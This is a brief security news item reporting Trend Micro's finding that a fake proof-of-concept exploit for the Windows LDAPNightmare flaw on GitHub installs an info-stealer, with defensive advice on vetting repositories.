BleepingComputer reports that an info-stealer has been distributed by hackers through a malicious GitHub repo with a fake proof-of-concept (PoC) exploit for the recently-patched Windows Lightweight Directory Access Protocol denial-of-service flaw dubbed LDAPNightmare (CVE-2024-49113).
Researchers at Trend Micro said executing the bogus exploit launches a PowerShell script in the targeted system's %Temp% folder that establishes a script-executing scheduled job to facilitate the eventual retrieval of the infostealing malware.
Aside from obtaining computer details and process and directory lists, such an infostealer also targets network adapter details and IP addresses for exfiltration to an external FTP server, said the researchers. These findings should prompt more extensive repository validation and code reviews, binary uploading to VirusTotal, and the avoidance of any obfuscated code.
